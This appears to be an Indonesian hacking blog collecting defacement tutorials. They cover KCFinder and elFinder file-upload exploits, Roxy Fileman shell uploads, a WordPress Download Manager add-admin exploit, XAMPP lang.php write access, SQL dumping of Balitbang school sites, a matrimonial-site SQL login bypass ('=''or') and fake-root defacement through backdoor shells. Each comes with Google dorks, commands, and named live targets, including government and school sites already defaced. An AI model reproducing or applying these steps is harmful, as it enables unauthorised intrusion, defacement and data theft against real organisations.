Naufal Ardhani - Hallo gaesss udah jarang jarang nih gua nulis di blog ini dan sekarang lagi pengen banget ngepost artikel di blog tapi masalahnya gua bingung mau nulis apa, dan tiba tiba aja kepikiran nulis Tutorial Deface POC KCFinder di Terminal dengan cURL.
KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.
cURL adalah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data menggunakan berbagai protokol.
Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.
Oke langsung aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu bahan yang diperlukan,
Bahan :
- Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
- Terminal / CMD
Tested :
- Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
- lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini target saya sudah ada seperti berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
- Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ setelah /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.
Sekian saja tutorial kali ini semoga sedikit bermanfaat ilmunya untuk menjadi Security Hunter :v
Naufal Ardhani - Halo gaes dah lama ga update artikel nihh kali ini saya bakal bagiin Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin), Cocok banget buat Defacer yang suka deface CMS Wordpress Exploit ini cukup mudah tapi cari targetnya yang males karna saya gasuka dorking -_- jadi ditutorial ini gapake livetarget dulu.
Sebelumnya bagi anda yang belum tau apa itu
Remote Code Execution simak sedikit penjelasan dibawah,
Remote Code Execution (RCE) adalah bug yg memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi. ( Sumber : FACEBOOK )
Bahan :
Dork :
- index of "download-manager"
- index of "download-manager" inurl:/wp
- index of "download-manager" inurl:/wordpress/
Step :
- Buka Terminal anda
- Open ke Directory dimana anda menyimpan Exploiternya ( kalau saya di Documents/doc/tools ) jadi commandnya : cd Documents/doc/tools/
- Sudah ketemu exploiter.py nya lalu jalankan dengan command : python exploiter.py
- Jika sudah mendapatkan taget langsung saja eksekusi dengan command : python exploiter.py -t http://www.site-target.com
SEKEDAR GAMBARAN JIKA BERHASIL
[!] Account Added
[!] Location: http://10.0.0.67/wordpress/wp-login.php
[!] Username: r7Uo4v
[!] Password: YN1G1F
Sekian Artikel Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)
Naufal Ardhani - Hallo gaess kali ini gua bakal bagiin
Tutorial Deface elFinder + Upload Shell, Exploit ini sudah cukup lama ya tapi masih ada aja website yang masih vuln dengan exploit ini :v
dan pas gua lagi Pentest web
http://labuankec.pandeglangkab.go.id/ gua nemuin directory /elFinder/ dan langsung aja gua upload shell dan bugnya dah ditambel.
Dork :
- inurl:elfinder/elfinder.php.html ( dork kembangin lagi ya biar dapet yang vuln )
Exploit :
- www.site.com/[path]/elfinder/elfinder.php.html
Live Target : http://labuankec.pandeglangkab.go.id/
Step :
- Dorking di google, pilih target dan kasih exploit satu satu
- dan Disini gua pake Live Target dan beri exploitnya : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder/elfinder.php.html
Langsung aja Upload Shell dengan ekstensi .phtml
lalu Akses deh Shellnya di www.site.com/[path]/elfinder/files/oxy.phtml
Sekian Tutorial Deface elFinder + Upload Shell semoga bermanfaat ilmunya.
nb : saya tidak bertanggung jawab atas apa yang kalian telah lakukan karna saya hanya membagikan ilmu untuk membantu admin web :3
Naufal Ardhani - Hallo gaes kali ini gua bakal bagiin ke-kalian
Tutorial Dump Database CMS Balitbang dengan Mudah, Kenapa mudah? ya karna ini inject databasenya pake tools jadi gaperlu manual lagi hehe dan target web yang pake cms balitbang masih banyak yg bisa di inject.
Bahan yang diperlukan :
- Tools ( KLIK INI )
- Akses Shell ( untuk upload tools ini )
- Google Dork ( inurl:/html/index.php site:sch.id )
Step :
- dorking target dulu.
- masukan url target yang sudah didapatkan.
- langsung klik inject ( dios sudah otomatis ada )
Jika berhasil akan muncul outputnya
Sekian Tutorial Dump Database CMS Balitbang dengan Mudah semoga bermanfaat yaaa.
Tutorial Cara Deface Metode Effi File Manager - Hai guys kali ini saya ingin memberitahu tentang Tutorial Cara Deface Metode Effi File Manager Upload Shell kalau kalian belom pernah coba poc yang satu ini akan sedikit membuat bingung karna target memakai windows server hehe, kalo udah master lewat aja jangan bully.
Yang Dibutuhkan :
- ASPX Shell ( khusus untuk windows server ) | Jika belom ada Download disini.
- Google Dork dan Exploit
- Pc / Android
- Kalem Terosss :v
Dork :
- inurl:jquery.tinymce.roxy.fileman ( kembangkan lagi )
Exploit :
- /jquery.tinymce.roxy.fileman/
Step :
- Dorking dulu webnya, jika sudah pilih salah satu.
- kasih exploit, contoh : www.site.com/jquery.tinymce.roxy.fileman/ s
- Lalu Upload Shellnya, misal : shell.aspx, tunggu sampai 100% berhasil.
- Lalu untuk preview Shellnnya, buka www.site.com/jquery.tinymce.roxy.fileman/directory/shell.aspx
Sudah seperti gambar diatas? yaudah itu udah terserah kalian, tapi kalau saya menitip file di dir htdocs/index.htm
Live Target : https://redoxomics.febsevents.org/
Dibuat Oleh : ./E4OXY
Nb : Saya tidak bertanggung jawab jika terjadi masalah, saya disini hanya membagikan ilmu, dan gunakan sebaik baiknya :)
Naufal Ardhani - Kali in saya akan memberikan
Tutorial Deface Xampp Local Write Access, POC ini sedang banyak dipakai oleh defacer defacer karna apa? ntah lah :v karna saya cuma liat show off defacer di grup grup yang ada dan apa keuntunganya? hemmm... keuntungannya ialah bisa mirror di Zone-H :)
Oke Langsung aja
-
Dork
- inurl:/security/lang.php
- inurl:/xampp/lang.php
-Exploit
- /xampp/lang.php?Hacked_By_E4OXY ( untuk dir xampp )
- /security/lang.php?Hacked_By_E4OXY ( untuk dir security )
-Preview
- /xampp/lang.tmp ( untuk dir xampp )
- /security/lang.tmp ( untuk dir security )
-Step
- Dorking dulu, kalau saya menggunakan dork "inurl:/security/lang.php intext:xampp",

Beri Exploitnya, contoh "/security/lang.php?Hacked_By_E4OXY" (karna disini saya pakai dork yang inurl:security/lang.php jadi exploitnya juga di dir security),
Jika berhasil akan seperti gambar dibawah,
Untuk Preview hasilnya tinggal beri "/security/lang.tmp", contoh http://vega-apache.ingeneo.co/security/lang.tmp
Hasil saya :
http://www.mp-mall.com.hk/security/lang.tmp
http://www.moghulisran.com/security/lang.tmp
http://www.altebagestion.net/security/lang.tmp
http://vega-apache.ingeneo.co/security/lang.tmp
SEKIAN WASSALAM :)
Naufal Ardhani - Hello heker-heker lokal yang berbahagia, di artikel ini saya akan memberikan Tutorial Deface POC
Matrimonial Auth Bypass Admin Vulnerability . ada yang udah pernah mencoba POC ini? ya kalau udah.. boleh di baca lagi dan kalau belom ya silahkan dicoba bang.
[+] Demo : www.teluguchristianmatrimony.com
[+] Dork : "printprofile.php?id="
[+] U & P : '=''or'
[+] Step
- Dorking dulu webnya di google atau search engine lain
- Lalu kasi /admin/ contoh www.site.com/admin/ | www.teluguchristianmatrimony.com/admin/
Jika sudah ter redirect ke page login admin masukan username dan password '=''or' seperti di gambar diatas
Kalau berhasil bypass, kalian akan masuk ke Admin Panel seperti gambar dibawah
- Langsung aja ke Web Settings di Site Configuration, ganti semua deh dengan text Hacked by.... atau apalah :v
- dan yang terubah hanya title web dll, tapi buat mirror + ngeshoof bisa lah :v untuk tebas index atau upload shell saya belom bisa untuk poc ini karena baru aja saya pelajari kalau sudah bisa upload shell atau jso segera saya upload tutorial selanjutnya
SEKIAN
Naufal Ardhani - Hallo para defacer2 lokal yang berbahagia :v kali ini saya bakal share
Tutorial Deface dengan Fake Root banyak yang request tutorial dengan perkataan "Gimana sih cara Deface dengan Fake Root" dan lain sebagainya.
tapi sebelumnya anda harus memiliki shell backdoor yang terpasang di website.... karna apa? ya karna web tersebut yang akan kita reverse ip untuk fake root, oke langsung aja cek dibawah.
Bahan :
- Shell Backdoor : ( Shell Noname )
- Web yang sudah tertanam shell
- Script Deface ( Klik )
Step :
- Buka Shell Backdoor Kalian yang sudah tertanam dan Upload Script Deface, misal saya upload : oxy.php

Lalu sekarang kita ke web Reverse IP
klik here
lalu kalau sudah masukan domain web yang anda sudah di tanamkan shell tanpa https:// dan / contoh : www.google.com
ambil salah satu domain dan anda kasih tanda /~namauser/namafile.php contoh : site.com /~namauser/namafile.php / site.com /~namauser/namafile.php
dan kalau tampilan sudah ter hacked ya berarti berhasil
SEKIAN aja yaa, kalau kurang jelas silahkan komen :)